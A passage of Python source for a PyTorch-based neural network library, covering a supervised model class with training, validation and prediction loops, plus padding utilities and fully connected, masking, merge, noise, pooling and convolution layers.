old_metrics = standardize_list_input(metrics)
metrics = []
for metric in old_metrics:
if isinstance(metric, str):
metrics.append(load_metric(metric))
elif isinstance(metric, Metric):
metrics.append(metric)
else:
metrics.append(AverageMetric(metric))
return metrics
# TODO Not sure whether I'll need to seperate RL models and SL models.
# Hopefully I planned this out right
class SLModel(nn.Module):
def __init__(self, torch_module=None):
super(SLModel, self).__init__()
self.to_cuda = use_cuda
self.loss_in = []
self.torch_module = torch_module
self.loss_manager = LossManager()
self.optimizer_manager = OptimizerManager()
def infer_inputs(self, *inputs, **kwargs):
self.cast_model_to_cuda()
with torch.no_grad():
self.forward(*inputs, **kwargs)
def parameters(self, *args, **kwargs):
params = super(SLModel, self).parameters(*args, **kwargs)
param_peek = peek(params)
if param_peek is None:
warnings.warn("Model has no parameters! Did you forget to call "
"infer_inputs?")
return []
return param_peek[1]
def forward(self, *inputs, **kwargs):
if self.torch_module is not None:
self.loss_in = self.torch_module.forward(*inputs, **kwargs)
return self.loss_in
raise NotImplementedError()
def cast_input_to_torch(self, x):
return Variable(from_numpy(x))
def cast_target_to_torch(self, y):
return Variable(from_numpy(y))
def cast_output_to_numpy(self, preds):
return preds.data.cpu().numpy()
def cast_model_to_cuda(self):
if self.to_cuda:
self.cuda()
self.to_cuda = False
return
def add_optimizer(self, optimizer, name=None):
self.optimizer_manager.add_optimizer(optimizer, name=name)
def remove_optimizer(self, name=None):
return self.optimizer_manager.remove_optimizer(name=name)
def clear_optimizers(self):
self.optimizer_manager.clear_optimizers()
def loss(self, targets):
return self.loss_manager.loss(self, targets)
def add_loss(self, loss_fn, inputs=(), weight=1.0, name=None):
inputs = standardize_list_input(inputs)
# Use 'loss_in' if no inputs provided
if not len(inputs):
inputs = ['loss_in']
return self.loss_manager.add_loss(loss_fn,
inputs,
weight=weight,
name=name)
def remove_loss(self, name=None):
return self.loss_manager.remove_loss(name=name)
def clear_losses(self):
self.loss_manager.clear_losses()
def compile_loss(self, loss_fn=None):
"""
This is a function to standardize loss input and hack it to behave like
a metric. A few key notes to remember:
- If the loss_fn is None, it will just use the loss method
defined by the model. This by default comes from the loss manager
which is modified by the add_loss, remove_loss, and clear_losses
methods. If a loss_fn is provided, then this method will clear
all current losses from the loss manager and add the input loss
function to it, taking as input the default "loss_in" parameter.
If you override the model's loss function, then passing a loss_fn
will have no effect!
- If there is more than one loss in the loss manager, then this
function will also return metric versions of all the auxilary
losses. The overall loss function is only computed once,
the auxilary loss scores are taken from loss cache.
Args:
loss_fn: The loss function to compile. Defaults to None. See above
note for explanation of behavior when None and when not None.
Returns:
(tuple): All the relevant loss functions in a tuple. See above note
for more explanation about how this return value is determined
"""
# if loss_fn is defined, clear the losses, and set it to the input
# loss_fn
if loss_fn is not None:
if len(self.loss_manager):
warnings.warn("Loss manager is not empty, but loss_fn passed "
"passed to fit_generator or validate_generator."
" Clearing all past losses.")
self.clear_losses()
self.add_loss(loss_fn)
# Compile the main loss
def loss(preds, targets):
# Preds are not used, just works as metric)
return self.loss(targets)
# Compile the auxilary losses, the main loss must be called before
# the auxilary losses
aux_losses = []
# Only account for auxilary losses if there is more than one loss
if len(self.loss_manager) > 1:
for name in self.loss_manager.names:
# Using the default value gets around the problem of late
# binding.
# https://stackoverflow.com/questions/3431676/creating-functions-in-a-loop
def aux_loss(preds, targets, name=name):
# Preds are not used, just hack to make it behave like
# metric
return self.loss_manager.get_loss_score(name=name)
metric_aux_loss = AverageMetric(aux_loss)
# Change the name for logging
metric_aux_loss.__name__ = name
aux_losses.append(metric_aux_loss)
return (AverageMetric(loss), *aux_losses)
def train_on_batch(self, x, target, optimizers, loss_fn, metrics=()):
"""
Trains the SLModel on a single batch of data.
Args:
x: A batch of input into the model.
target: The corresponding labels for the batch x.
optimizers: A list of optimizers to run with the model.
loss_fn: The loss function to run on the model
metrics: A list of metrics to calculate on the output of the model
Returns:
A tuple where the first element is the loss over the batch and the
second element is a list of the scores corresponding to the input
metrics.
"""
self.cast_model_to_cuda()
self.train()
# Cast inputs to a torch variable
torch_x = self.cast_input_to_torch(x)
torch_target = self.cast_target_to_torch(target)
# Make the prediction
torch_preds = self(torch_x)
# Calculate the loss
loss = loss_fn(torch_preds, torch_target)
# Update the weights
[optimizer.zero_grad() for optimizer in optimizers]
loss.backward()
[optimizer.step() for optimizer in optimizers]
# Calculate the metrics
metric_scores = [
metric(torch_preds, torch_target) for metric in metrics
]
# Clean up some variables
self.zero_grad()
del torch_x
del torch_target
del torch_preds
if use_cuda:
torch.cuda.empty_cache()
return loss, metric_scores
def validate_on_batch(self, x, target, metrics):
self.cast_model_to_cuda()
self.eval()
with torch.no_grad():
# Cast inputs to a torch variable and set to volatile for inference
torch_x = self.cast_input_to_torch(x)
torch_target = self.cast_target_to_torch(target)
# Make the prediction
torch_preds = self(torch_x)
preds = self.cast_output_to_numpy(torch_preds)
# Calculate the metrics
metric_scores = [
metric(torch_preds, torch_target) for metric in metrics
]
# Clean up some variables
del torch_x
del torch_preds
del torch_target
if use_cuda:
torch.cuda.empty_cache()
return metric_scores, preds
def validate_generator(self,
val_generator,
validation_steps,
loss_fn=None,
metrics=(),
verbose=0):
self.cast_model_to_cuda()
metrics = standardize_metric_input(metrics)
if loss_fn is not None or len(self.loss_manager):
loss_fn, *aux_loss_fns = self.compile_loss(loss_fn)
metrics = [loss_fn] + metrics + aux_loss_fns
# Set up the logs
logs = TrainingLogs()
# Set the model to eval mode
self.eval()
callbacks = [ProgressBar(validation_steps)] if verbose > 0 else []
callbacks = CallbackList(callbacks)
callbacks.on_train_begin(logs=logs)
callbacks.on_epoch_begin(0, logs=logs.epoch_logs)
for step in range(validation_steps):
callbacks.on_batch_begin(epoch=0, step=step, logs=logs.batch_logs)
x, target = next(val_generator)
b_metrics, _ = self.validate_on_batch(x, target, metrics)
for metric, score in zip(metrics, b_metrics):
logs.log_metric(metric, score)
callbacks.on_batch_end(epoch=0, step=step, logs=logs.batch_logs)
callbacks.on_epoch_end(0, logs=logs.epoch_logs)
callbacks.on_train_end(logs=logs)
return logs.epoch_logs
def fit_generator(self,
generator,
steps_per_epoch,
epochs,
validation_data=None,
validation_steps=0,
metrics=(),
callbacks=(),
initial_epoch=0,
verbose=1):
self.cast_model_to_cuda()
# Standardize the input
optimizers = self.optimizer_manager.optimizers
loss_fn, *aux_loss_fns = self.compile_loss()
metrics = standardize_metric_input(metrics) + aux_loss_fns
callbacks = CallbackList(callbacks)
# If the verbosity is set, set up the progress bar
if verbose > 0:
callbacks.append(ProgressBar(steps_per_epoch, epochs=epochs))
# Register the model with each callback
callbacks.set_model(self)
# Save whether we will need to run validation
run_validation = (validation_steps >
0) and validation_data is not None
logs = TrainingLogs()
# Run the callbacks
callbacks.on_train_begin(logs=logs)
# Loop through all the epochs
for epoch in range(initial_epoch, epochs):
# Put the model in train mode
self.train()
# Reset the metrics
loss_fn = loss_fn.reset()
metrics = [metric.reset() for metric in metrics]
# Run the callbacks
logs.on_epoch_begin()
callbacks.on_epoch_begin(epoch, logs=logs.epoch_logs)
# Run each step of the epoch with a progress bar
for step in range(steps_per_epoch):
# Run the callbacks
callbacks.on_batch_begin(
epoch=epoch, step=step, logs=logs.batch_logs)
x, target = next(generator)
b_loss, b_metrics = self.train_on_batch(
x, target, optimizers, loss_fn, metrics)
# Add stats to the logs
logs.log_metric(loss_fn, b_loss)
for score, metric in zip(b_metrics, metrics):
logs.log_metric(metric, score)
# Run the callbacks
callbacks.on_batch_end(
epoch=epoch, step=step, logs=logs.batch_logs)
# Check if we need to run validation
if run_validation:
loss_fn = loss_fn.reset()
metrics = [metric.reset() for metric in metrics]
self.validate_generator(
validation_data,
validation_steps,
metrics=([loss_fn] + metrics))
# Log the loss and metrics
for metric in [loss_fn] + metrics:
logs.log_validation_metric(metric)
# Run the callbacks
logs.on_epoch_end()
callbacks.on_epoch_end(epoch, logs=logs.epoch_logs)
# Run the callbacks
callbacks.on_train_end(logs=logs)
# Put the model back in eval mode
self.eval()
return logs
def predict_on_batch(self, x):
self.cast_model_to_cuda()
self.eval()
with torch.no_grad():
# Cast inputs to a torch variable and set to volatile for inference
torch_x = self.cast_input_to_torch(x)
# Make the prediction
torch_preds = self(torch_x)
preds = self.cast_output_to_numpy(torch_preds)
self.zero_grad()
del torch_x
del torch_preds
if use_cuda:
torch.cuda.empty_cache()
# cast to numpy and return
return preds
def predict_generator(self, generator, prediction_steps, verbose=0):
self.cast_model_to_cuda()
self.eval()
preds = []
# Loop through all the steps
progbar = tqdm if verbose > 0 else lambda x: x
for _ in progbar(range(prediction_steps)):
x = next(generator)
batch_preds = self.predict_on_batch(x)
# Check to make sure the ndim is the same
if len(preds) > 0:
assert batch_preds.ndim == preds[-1].ndim
preds.append(batch_preds)
# Supports variable sized predictions - get the biggest possible shape
num_preds = sum(len(batch_preds) for batch_preds in preds)
max_shape = [num_preds] + [
max(preds[n].shape[i] for n in range(len(preds)))
for i in range(1, preds[0].ndim)
]
full_preds = np.zeros(max_shape, dtype=preds[0].dtype)
# Fill in the predictions array
cur_pred_ind = 0
for batch_preds in preds:
preds_slice = (slice(cur_pred_ind,
cur_pred_ind + len(batch_preds)), ) + tuple(
slice(batch_preds.shape[i])
for i in range(1, batch_preds.ndim))
full_preds[preds_slice] = batch_preds
cur_pred_ind += len(batch_preds)
return full_preds
def save_state(self, save_path):
return torch.save(self.state_dict(), save_path)
def load_state(self, load_path):
self.load_state_dict(torch.load(load_path))
"""
LAYERS
Files Included:
layer_utils.py
layer.py
functions.py
core.py
merge.py
noise.py
pooling.py
convolutional.py
recurrent.py
attentional.py
"""
# layer_utils.py
pool_types = {"no_pool": lambda *args, **kwargs: lambda x: x,
"max": nn.MaxPool1d,
"avg": nn.AvgPool1d}
activation_types = {name.lower(): cls for name, cls in nn.modules.activation.__dict__.items() if isinstance(cls, type)}
activation_types["linear"] = None
def get_type(item_type, type_dict, fail_message):
try:
if not isinstance(item_type, str):
return item_type
return type_dict[item_type]
except KeyError:
raise NotImplementedError(fail_message)
def get_pool_type(pool_type):
return get_type(pool_type, pool_types, "pool type %s" % pool_type)
def get_activation_type(activation_type):
return get_type(activation_type, activation_types, "Activation %s" % activation_type)
def construct_n_layers(layer_factory, num_layers, input_size, output_size, *args, **kwargs):
layers = nn.ModuleList([layer_factory(input_size, output_size, *args, **kwargs)])
for _ in range(num_layers - 1):
layers.append(layer_factory(output_size, output_size, *args, **kwargs))
return layers
def get_input_shape(inputs):
return tuple(inputs.size())[1:]
def builder(func):
def build_layer(self, *args, **kwargs):
assert not self.built, "Cannot build a layer multiple times!"
func(self, *args, **kwargs)
if use_cuda:
self.cuda()
self.built = True
return build_layer
# layer.py
class Layer(nn.Module):
def __init__(self):
super(Layer, self).__init__()
self.built = False
def forward(self, *input):
raise NotImplementedError()
def reset_parameters(self):
pass
def __str__(self):
return self.__class__.__name__ + "()"
def __repr__(self):
return str(self)
# functions.py
# TODO: Add a cropping function
def pad_tensor(tensor, length, pad_value=0.0, dim=0):
# tensor is Li x E
tensor = tensor.transpose(0, dim).contiguous()
if tensor.size(0) == length:
tensor = tensor
elif tensor.size(0) > length:
return tensor[:length]
else:
tensor = torch.cat([tensor, Variable(zeros(length - tensor.size(0), *tensor.size()[1:]).fill_(pad_value),
requires_grad=False)])
return tensor.transpose(0, dim).contiguous()
def pad_sequences(tensors, pad_value=0.0, length_last=False):
# tensors is B x Li x E
# First find how long we need to pad until
length_dim = -1 if length_last else 0
assert len(tensors) > 0
if length_last:
assert all(tuple(seq.size())[:-1] == tuple(tensors[0].size())[:-1] for seq in tensors)
else:
assert all(tuple(seq.size())[1:] == tuple(tensors[0].size())[1:] for seq in tensors)
seq_lens = [seq.size(length_dim) for seq in tensors]
max_len = max(seq_lens)
# Out is B x L x E
# print([tuple(pad_tensor(tensors[i], max_len).size()) for i in range(len(tensors))])
if length_last:
return torch.stack(
[pad_tensor(tensors[i].transpose(0, length_dim), max_len, pad_value=pad_value).transpose(0, length_dim)
for i in range(len(tensors))]), seq_lens
return torch.stack([pad_tensor(tensors[i], max_len, pad_value=pad_value) for i in range(len(tensors))]), seq_lens
def unpad_sequences(padded_tensors, seq_lens, length_last=False):
length_dim = -1 if length_last else 0
if length_last:
return [padded_tensor.transpose(0, length_dim)[:seq_len].transpose(0, length_dim) for padded_tensor, seq_len in
zip(padded_tensors, seq_lens)]
return [padded_tensor[:seq_len] for padded_tensor, seq_len in zip(padded_tensors, seq_lens)]
def pack_sequences(tensors):
# tensors is B x Li x E
assert len(tensors) > 0
assert all(seq.size(1) == tensors[0].size(1) for seq in tensors)
seq_lens = [seq.size(0) for seq in tensors]
return torch.cat(tensors), seq_lens
def unpack_sequences(packed_tensors, seq_lens):
# Find the start inds of all of the sequences
seq_starts = [0 for _ in range(len(seq_lens))]
seq_starts[1:] = [seq_starts[i-1] + seq_lens[i-1] for i in range(1, len(seq_starts))]
# Unpack the tensors
return [packed_tensors[seq_starts[i]:seq_starts[i] + seq_lens[i]] for i in range(len(seq_lens))]
def kmax_pooling(x, dim, k):
index = x.topk(min(x.size(dim), k), dim=dim)[1].sort(dim=dim)[0]
x = x.gather(dim, index)
if x.size(dim) < k:
x = pad_tensor(x, k, dim=dim)
return x
def pad_numpy_to_length(x, length):
if len(x) < length:
return np.concatenate([x, np.zeros((length - len(x),) + x.shape[1:])], axis=0)
return x
def pad_numpy_to_shape(x, shape):
pad_diffs = [length - x_len for x_len, length in zip(x.shape, shape)]
pad_args = [(0, pad_diff) for pad_diff in pad_diffs] + [(0, 0)] * (x.ndim - len(shape))
return np.pad(x, pad_args, mode='constant')
def create2d_mask(x, seq_lens):
# seq_lens are of shape B x 2
# x is of shape B x H x W x F
# shape is B x H x 1 x 1
seq_lens_heights = seq_lens.view(-1, 2, 1, 1)[:, 0:1]
seq_lens_widths = seq_lens.view(-1, 1, 2, 1)[:, :, 1:2]
mask_height = Variable((arange(x.size(1)).long().view(1, -1, 1, 1) >= seq_lens_heights),
requires_grad=False)
# shape is B x 1 x W x 1
mask_width = Variable((arange(x.size(2)).long().view(1, 1, -1, 1) >= seq_lens_widths),
requires_grad=False)
# shape is B x H x W x 1
mask = mask_height | mask_width
return mask
def seq_softmax(x, return_padded=False):
# x comes in as B x Li x F, we compute the softmax over Li for each F
x, lens = pad_sequences(x, pad_value=-float('inf')) # B x L x F
shape = tuple(x.size())
assert len(shape) == 3
x = F.softmax(x, dim=1)
assert tuple(x.size()) == shape
if return_padded:
return x, lens
# Un-pad the tensor and return
return unpad_sequences(x, lens) # B x Li x F
# core.py
# TODO Create abstract layers for layers with params that includes weight regularizers
def Input(*input_shape):
# Use 1 for the batch size
return zeros(1, *input_shape)
def build_fully_connected(units, input_shape, use_bias=True, \
activation='linear', num_layers=1, batchnorm=False,
input_dropout=0.0, dropout=0.0):
assert len(input_shape) == 1, "Input to FullyConnected layer " \
"can only have 1 dimension. {} has {} dimensions" \
"".format(input_shape, len(input_shape))
input_size, output_size = input_shape[0], units
layer = nn.Sequential()
if input_dropout:
layer.add_module(name="input-dropout", module=nn.Dropout(input_dropout))
for i in range(num_layers):
layer_input = input_size if i == 0 else output_size
layer.add_module(name="fullyconnected-%s" % i, module=nn.Linear(layer_input, output_size, bias=use_bias))
if activation != "linear":
layer.add_module(name="{}-{}".format(activation, i), module=get_activation_type(activation)())
if batchnorm:
layer.add_module(name="batchnorm-%s" % i, module=nn.BatchNorm1d(output_size))
if dropout:
layer.add_module(name="dropout-%s" % i, module=nn.Dropout(dropout))
logging.info("Creating layer: %r" % layer)
return layer
class FullyConnected(Layer):
"""Just your regular fully-connected NN layer.
`FullyConnected` implements the operation:
`output = activation(dot(input, kernel) + bias)`
where `activation` is the element-wise activation function
passed as the `activation` argument, `kernel` is a weights matrix
created by the layer, and `bias` is a bias vector created by the layer
(only applicable if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then
it is flattened prior to the initial dot product with `kernel`.
# Example
```python
# A layer that takes as input tensors of shape (*, 128)
# and outputs arrays of shape (*, 64)
layer = FullyConnected(128, 64)
tensor = torch.randn(32, 128)
output = layer(tensor)
```
# Arguments
input_size: Positive integer, dimensionality of the input space.
output_size: Positive integer, dimensionality of the input space.
activation: String, Name of activation function to use
(supports "tanh", "relu", and "linear").
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
# Input shape
2D tensor with shape: `(batch_size, input_size)`.
# Output shape
2D tensor with shape: `(batch_size, output_size)`.
"""
def __init__(self, units, input_shape=None,
use_bias=True, activation='linear', num_layers=1,
batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(FullyConnected, self).__init__()
self.units = units
self.input_shape = input_shape
self.activation = activation
self.use_bias = use_bias
self.num_layers = num_layers
self.batchnorm = batchnorm
self.input_dropout = input_dropout
self.dropout = dropout
# We'll initialize the layers in the first forward call
self.layers = []
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
self.layers = build_fully_connected(
self.units, self.input_shape, use_bias=self.use_bias,
activation=self.activation, num_layers=self.num_layers,
batchnorm=self.batchnorm, input_dropout=self.input_dropout,
dropout=self.dropout
)
def forward(self, inputs):
if not self.built:
self.__build_layer(inputs)
return self.layers(inputs)
def reset_parameters(self):
for layer in self.layers:
if isinstance(layer, nn.BatchNorm1d) or isinstance(layer, nn.Linear):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return "%r" % self.layers
class Flatten(Layer):
"""Flattens the input. Does not affect the batch size.
# Example
```python
flatten = Flatten()
tensor = torch.randn(32, 2, 3)
# The output will be of shape (32, 6)
output = flatten(tensor)
```
"""
def __init__(self):
super(Flatten, self).__init__()
def __str__(self):
return "Flatten"
def forward(self, x):
return flatten(x)
class Lambda(Layer):
"""Wraps arbitrary expression as a `Module` object. The input function must
have a self argument first!
# Examples
```python
# add a x -> x^2 layer
layer = Lambda(lambda self, x: x ** 2))
```
```python
# add a layer that returns the concatenation
# of the positive part of the input and
# the opposite of the negative part
def antirectifier(self, x):
x = self.fc(x)
x -= torch.mean(x, dim=1, keepdim=True)
pos = F.relu(x)
neg = F.relu(-x)
return torch.cat([pos, neg], dim=1)
layer = Lambda(antirectifier, fc=Linear(256, 128))
```
# Arguments
forward: The function to be evaluated. Should take self (the lambda object) as first argument
layers: optional dictionary of keyword arguments that map layer names to already initialized layers.
These layers will be accessible in the forward function by using 'self.[LAYER_NAME]', replacing
[LAYER_NAME] for whatever the name of the layer you want to access is.
"""
def __init__(self, forward, **layers):
super(Lambda, self).__init__()
for layer_name in layers:
setattr(self, layer_name, layers[layer_name])
self.layer_names = list(layers.keys())
self.forward_func = forward
self.string = "Lambda: [" + " ".join("%r" % getattr(self, layer_name) for layer_name in self.layer_names) + "]"
def __str__(self):
return self.string
def forward(self, *args, **kwargs):
return self.forward_func(self, *args, **kwargs)
def reset_parameters(self):
for layer_name in self.layer_names:
getattr(self, layer_name).reset_parameters()
class MaskedInput(Layer):
"""
A layer that takes in sequences of variable length as inputs that have
been padded. This layer will take as input a padded torch tensor where the sequence
length varies along the first dimension of each sample as well as a LongTensor of lengths of
each sequence in the batch. The layer will mask the padded regions of the output of the layer
to cut the gradient.
# Arguments
mask_value: The value to mask the padded input with. If passed "min" instead of a value, this will
mask to whatever the smallest value in the batch is minus 1 (usefuly if passing to a max pooling layer).
This defaults to 0.
"""
def __init__(self, mask_value=0.):
super(MaskedInput, self).__init__()
if mask_value == 'min':
self.mask_value_factory = lambda x: torch.min(x.data) - 1.
else:
self.mask_value_factory = lambda x: mask_value
self.mask_value = mask_value
self.__descriptor = self.__class__.__name__ + "(mask_value=%s)" % self.mask_value
logging.info("Creating layer: %s" % self.__descriptor)
def forward(self, x, seq_lens):
mask = Variable((arange(x.size(1)).long().view(1, -1, 1) >= seq_lens.view(-1, 1, 1)), requires_grad=False)
mask_value = self.mask_value_factory(x)
return x.masked_fill(mask, mask_value)
def __str__(self):
return self.__descriptor
class MaskedInput2D(MaskedInput):
"""
A layer that takes in sequences of variable length as inputs that have
been padded. This layer will take as input a padded torch tensor where the sequence
length varies along the first dimension of each sample as well as a LongTensor of lengths of
each sequence in the batch. The layer will mask the padded regions of the output of the layer
to cut the gradient.
# Arguments
mask_value: The value to mask the padded input with. If passed "min" instead of a value, this will
mask to whatever the smallest value in the batch is minus 1 (usefuly if passing to a max pooling layer).
This defaults to 0.
"""
def forward(self, x, seq_lens):
# seq_lens are of shape B x 2
# x is of shape B x H x W x F
mask = create2d_mask(x, seq_lens)
mask_value = self.mask_value_factory(x)
return x.masked_fill(mask, mask_value)
def __str__(self):
return self.__descriptor
# merge.py
class Concatenate(Layer):
"""Layer that concatenates a list of inputs.
It takes as input a list of tensors,
all of the same shape except for the concatenation dim, the
dimension over which to concatenate,
and returns a single tensor, the concatenation of all inputs.
"""
def __init__(self):
super(Concatenate, self).__init__()
def forward(self, seq, dim=-1):
if dim >= 0:
dim += 1
return torch.cat(seq, dim=dim)
class Add(Layer):
"""Layer that adds a list of inputs.
It takes as input a list of tensors,
all of the same shape, and returns
a single tensor (also of the same shape).
# Examples
```python
import pyjet
input1 = torch.randn(32, 16)
x1 = pyjet.layers.FullyConnected(8, activation='relu')(input1)
input2 = torch.randn(32, 16)
x2= pyjet.layers.FullyConnected(8, activation='relu')(input2)
added = pyjet.layers.Add()([x1, x2]) # equivalent to added = x1 + x2
out = pyjet.layers.FullyConnected(4)(added)
```
"""
def __init__(self):
super(Add, self).__init__()
def forward(self, seq):
return sum(seq)
# noise.py
class GaussianNoise1D(Layer):
def __init__(self, std=0.05, augment_prob=1.0):
super().__init__()
self.std = std
self.augment_prob = augment_prob
self.noise_size = tuple()
self.noise = None
self.mask_sample = None
self.__descriptor = "{name}(std={std}, augment_prob={augment_prob})".format(name=self.__class__.__name__, std=std, augment_prob=augment_prob)
logging.info("Creating layer %r" % self)
def forward(self, x):
if not self.training:
return x
self.init_noise(x)
if self.augment_prob != 1.0:
# 0 out the elements we don't want to change
self.noise.data.masked_fill_(self.mask_sample > self.augment_prob, 0.)
return x + self.noise
def init_noise(self, x):
# Create the noise (w/ mem optimization)
x_shape = tuple(x.size())
if self.noise_size != x_shape:
self.noise = Variable(zeros(*x_shape), requires_grad=False)
self.mask_sample = None if self.augment_prob == 1.0 else rand(*x_shape[:-1]).unsqueeze(-1)
self.noise_size = x_shape
else:
self.mask_sample.uniform_()
self.noise.data.normal_(0, std=self.std)
def __str__(self):
return self.__descriptor
# pooling.py
def build_strided_pool(name, kernel_size, stride=None, padding=1, dilation=1):
layer = StridedPool.pool_funcs[name](kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation)
logging.info("Creating layer: %r" % layer)
return layer
class UpSampling(Layer):
def __init__(self, size=None, scale_factor=None, mode='nearest'):
super(UpSampling, self).__init__()
self.upsampling = partial(F.interpolate, size=size, scale_factor=scale_factor, mode=mode)
self.size = size
self.scale_factor = scale_factor
self.mode = mode
def calc_output_size(self, input_size):
if self.size is not None:
return LongTensor(self.size)
else:
return input_size * self.scale_factor
def calc_input_size(self, output_size):
if self.size is not None:
raise ValueError("Cannot know input size if deterministic output size is used")
else:
return output_size / self.scale_factor
def forward(self, x):
# Expect x as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
return self.unfix_input(self.upsampling(self.fix_input(x)))
else:
return self.upsampling(x)
def fix_input(self, x):
raise NotImplementedError()
def unfix_input(self, x):
raise NotImplementedError()
def __str__(self):
return "%r" % self.upsampling
class UpSampling2D(UpSampling):
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
class StridedPool(Layer):
pool_funcs = {"max1d": nn.MaxPool1d,
"max2d": nn.MaxPool2d,
"max3d": nn.MaxPool3d,
"avg1d": nn.AvgPool1d,
"avg2d": nn.AvgPool2d,
"avg3d": nn.AvgPool3d}
def __init__(self, pool_type, kernel_size, stride=None, padding='same', dilation=1):
super(StridedPool, self).__init__()
padding = (kernel_size - 1) // 2 if padding == 'same' else padding
self.pool_type = pool_type
self.kernel_size = kernel_size
if stride is None:
stride = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.pool = build_strided_pool(pool_type, kernel_size, stride=stride, padding=padding, dilation=dilation)
def calc_output_size(self, input_size):
"""
NOTE: This is designed for pytorch longtensors, if you pass an integer, make sure to cast it back to an
integer as python3 will perform float division on it
"""
output_size = (input_size - self.dilation * (self.kernel_size - 1) + 2 * self.padding - 1) // self.stride + 1
return output_size
def calc_input_size(self, output_size):
return (output_size - 1) * self.stride - 2 * self.padding + 1 + self.dilation * (self.kernel_size - 1)
def forward(self, x):
# Expect x as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
return self.unfix_input(self.pool(self.fix_input(x)))
else:
return self.pool(x)
def fix_input(self, x):
raise NotImplementedError()
def unfix_input(self, x):
raise NotImplementedError()
def __str__(self):
return "%r" % self.pool
class Strided1D(StridedPool):
def fix_input(self, inputs):
return inputs.transpose(1, 2)
def unfix_input(self, outputs):
return outputs.transpose(1, 2)
class Strided2D(StridedPool):
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
class MaxPooling1D(Strided1D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(MaxPooling1D, self).__init__("max1d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class SequenceMaxPooling1D(MaxPooling1D):
def forward(self, seq_inputs):
return [super(SequenceMaxPooling1D, self).forward(sample.unsqueeze(0)).squeeze(0) for sample in seq_inputs]
class AveragePooling1D(Strided1D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(AveragePooling1D, self).__init__("avg1d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class MaxPooling2D(Strided2D):
def __init__(self, kernel_size, stride=None, padding='same', dilation=1):
super(MaxPooling2D, self).__init__("max2d", kernel_size, stride=stride, padding=padding, dilation=dilation)
class GlobalMaxPooling1D(Layer):
def __init__(self):
super(GlobalMaxPooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x L x E
return torch.max(x, dim=1)[0]
class SequenceGlobalMaxPooling1D(Layer):
def __init__(self):
super(SequenceGlobalMaxPooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x Li x E
return torch.stack([torch.max(seq, dim=0)[0] for seq in x])
class GlobalAveragePooling1D(Layer):
def __init__(self):
super(GlobalAveragePooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x L x E
return torch.mean(x, dim=1)
class SequenceGlobalAveragePooling1D(Layer):
def __init__(self):
super(SequenceGlobalAveragePooling1D, self).__init__()
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return input_size / input_size
def forward(self, x):
# The input comes in as B x Li x E
return torch.stack([torch.mean(seq, dim=0) for seq in x])
class KMaxPooling1D(Layer):
def __init__(self, k):
super(KMaxPooling1D, self).__init__()
self.k = k
# Logging
logging.info("Creating layer: {}".format(str(self)))
def calc_output_size(self, input_size):
return self.k * input_size / input_size
def forward(self, x):
# B x L x E
return kmax_pooling(x, 1, self.k)
def __str__(self):
return self.__class__.__name__ + "(k=%s)" % self.k
# convolutional.py
# TODO: Add padding and cropping layers
def build_conv(dimensions, input_size, output_size, kernel_size, stride=1,
dilation=1, groups=1, use_bias=True, input_activation='linear',
activation='linear', num_layers=1,
input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
# Create the sequential
layer = nn.Sequential()
# Add the input dropout
if input_dropout:
layer.add_module(
name="input-dropout",
module=nn.Dropout(input_dropout))
if input_batchnorm:
layer.add_module(
name="input-batchnorm",
module=Conv.bn_constructors[dimensions](input_size))
if input_activation != 'linear':
try:
layer.add_module(
name="input_{}".format(input_activation),
module=get_activation_type(input_activation)(inplace=True)
)
except TypeError: # If inplace is not an option on the activation
layer.add_module(
name="input_{}".format(input_activation),
module=get_activation_type(input_activation)())
# Add each layer
for i in range(num_layers):
layer_input = input_size if i == 0 else output_size
layer.add_module(name="conv-%s" % i,
module=Conv.layer_constructors[dimensions](
layer_input, output_size, kernel_size,
stride=stride, dilation=dilation, groups=groups,
bias=use_bias))
if activation != "linear":
try:
layer.add_module(
name="{}-{}".format(activation, i),
module=get_activation_type(activation)(inplace=True)
)
except TypeError: # If inplace is not an option on the activation
layer.add_module(
name="{}-{}".format(activation, i),
module=get_activation_type(activation)()
)
if batchnorm:
layer.add_module(
name="batchnorm-%s" % i,
module=Conv.bn_constructors[dimensions](output_size))
if dropout:
layer.add_module(name="dropout-%s" % i, module=nn.Dropout(dropout))
logging.info("Creating layers: %r" % layer)
return layer
class Conv(Layer):
layer_constructors = {1: nn.Conv1d, 2: nn.Conv2d, 3: nn.Conv3d}
bn_constructors = {1: nn.BatchNorm1d, 2: nn.BatchNorm2d, 3: nn.BatchNorm3d}
def __init__(self, dimensions, filters, kernel_size, input_shape=None,
stride=1, padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear', num_layers=1,
input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv, self).__init__()
# Catch any bad padding inputs (NOTE: this does not catch negative padding)
if padding != 'same' and not isinstance(padding, int):
raise NotImplementedError("padding: %s" % padding)
if dimensions not in [1, 2, 3]:
